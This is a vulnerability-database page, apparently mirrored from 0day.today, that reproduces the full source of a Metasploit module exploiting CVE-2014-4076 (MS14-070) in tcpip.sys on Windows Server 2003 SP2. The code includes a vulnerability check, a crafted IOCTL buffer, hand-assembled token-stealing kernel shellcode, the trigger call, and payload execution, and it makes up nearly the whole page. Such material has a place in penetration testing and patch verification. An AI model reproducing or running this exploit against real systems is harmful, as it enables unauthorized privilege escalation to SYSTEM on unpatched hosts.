Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Windows tcpip.sys Arbitrary Write Privilege Escalation Exploit

🗓️ 06 Feb 2015 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 89 Views

Windows tcpip.sys Arbitrary Write Privilege Escalation Exploit. Allows attacker to inject controlled memory into kernel

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Microsoft Windows Server 2003 SP2 - Privilege Escalation Exploit
29 Jan 201500:00
zdt
0day.today		Windows 2k3 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070) Exploit
15 Aug 201500:00
zdt
Circl		CVE-2014-4076
31 Mar 201706:46
circl
Check Point Advisories		Microsoft Windows TCP/IP IOCTL Processing Elevation of Privilege (MS14-070; CVE-2014-4076)
11 Nov 201400:00
checkpoint_advisories
CVE		CVE-2014-4076
11 Nov 201422:00
cve
Cvelist		CVE-2014-4076
11 Nov 201422:00
cvelist
Exploit DB		Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14-070)
29 Jan 201500:00
exploitdb
Exploit DB		Microsoft Windows Server 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)
12 Aug 201500:00
exploitdb
exploitpack		Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14-070)
29 Jan 201500:00
exploitpack
exploitpack		Microsoft Windows Server 2003 SP2 - TCPIP IOCTL Privilege Escalation (MS14-070)
12 Aug 201500:00
exploitpack
Rows per page
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/local/windows_kernel'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Exploit::Local::WindowsKernel
  include Msf::Post::File
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'Windows tcpip.sys Arbitrary Write Privilege Escalation',
      'Description'    => %q{
        A vulnerability within the Microsoft TCP/IP protocol driver tcpip.sys,
        can allow an attacker to inject controlled memory into an arbitrary
        location within the kernel.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
          'Jay Smith <jsmith[at]korelogic.com>' # MSF module
        ],
      'Arch'          => ARCH_X86,
      'Platform'      => 'win',
      'SessionTypes'  => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Targets'       =>
        [
          ['Windows Server 2003 SP2',
            {
              '_KPROCESS' => "\x38",
              '_TOKEN' => "\xd8",
              '_UPID' => "\x94",
              '_APLINKS' => "\x98"
            }
          ]
        ],
      'References'    =>
        [
          ['CVE', '2014-4076'],
          ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt']
        ],
      'DisclosureDate'=> 'Nov 11 2014',
      'DefaultTarget' => 0
    }))

  end

  def check
    if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
      return Exploit::CheckCode::Safe
    end

    handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    return Exploit::CheckCode::Safe unless handle

    session.railgun.kernel32.CloseHandle(handle)

    file_path = get_env('WINDIR') << "\\system32\\drivers\\tcpip.sys"
    unless file?(file_path)
      return Exploit::CheckCode::Unknown
    end

    major, minor, build, revision, branch = file_version(file_path)
    vprint_status("tcpip.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")

    if ("#{major}.#{minor}.#{build}" == "5.2.3790" && revision < 5440)
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    if is_system?
      fail_with(Exploit::Failure::None, 'Session is already elevated')
    end

    if sysinfo["Architecture"] =~ /wow64/i
      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
    elsif sysinfo["Architecture"] =~ /x64/
      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
    end

    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
    end

    handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    if handle.nil?
      fail_with(Failure::NoTarget, "Unable to open \\\\.\\tcp device")
    end

    print_status("Storing the shellcode in memory...")
    this_proc = session.sys.process.open

    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [0x1000].pack('V'), nil, [0x4000].pack('V'), "MEM_RESERVE|MEM_COMMIT", "PAGE_EXECUTE_READWRITE")

    unless this_proc.memory.writable?(0x1000)
      fail_with(Failure::Unknown, 'Failed to allocate memory')
    end

    buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"

    sc  = token_stealing_shellcode(target, nil, nil, false)
    # move up the stack frames looking for nt!KiSystemServicePostCall
    sc << "\x31\xc9"                     # xor ecx, ecx
    sc << "\x89\xeb"                     # mov ebx, ebp
    # count_frames
    sc << "\x41"                         # inc ecx
    sc << "\xf7\x43\x04\x00\x00\x00\x80" # test dword [ebx+4], 0x80000000
    sc << "\x8b\x1b"                     # mov ebx, dword [ebx]
    sc << "\x75\xf4"                     # jne short count_frames
    sc << "\x49"                         # dec ecx
    # loop_frames
    sc << "\x49"                         # dec ecx
    sc << "\x89\xec"                     # mov esp, ebp
    sc << "\x5d"                         # pop ebp
    sc << "\x83\xf9\x00"                 # cmp ecx, 0
    sc << "\x75\xf7"                     # jne loop_frames
    sc << "\x31\xc0"                     # xor eax, eax
    sc << "\xc3"                         # ret

    this_proc.memory.write(0x28, "\x87\xff\xff\x38")
    this_proc.memory.write(0x38, "\x00\x00")
    this_proc.memory.write(0x1100, buf)
    this_proc.memory.write(0x2b, "\x00\x00")
    this_proc.memory.write(0x2000, sc)

    print_status("Triggering the vulnerability...")
    session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x00120028, 0x1100, buf.length, 0, 0)
    #session.railgun.kernel32.CloseHandle(handle) # CloseHandle will never return, so skip it

    print_status("Checking privileges after exploitation...")

    unless is_system?
      fail_with(Failure::Unknown, "The exploitation wasn't successful")
    end

    print_good("Exploitation successful!")
    unless execute_shellcode(payload.encoded, nil, this_proc.pid)
      fail_with(Failure::Unknown, 'Error while executing the payload')
    end
  end

end

#  0day.today [2018-01-05]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Feb 2015 00:00Current
0.7Low risk
Vulners AI Score0.7
EPSS0.58454
windowstcpip.sysarbitrary writeprivilege escalationvulnerabilitymetasploitexploitmicrosoft tcp/ipkernel
89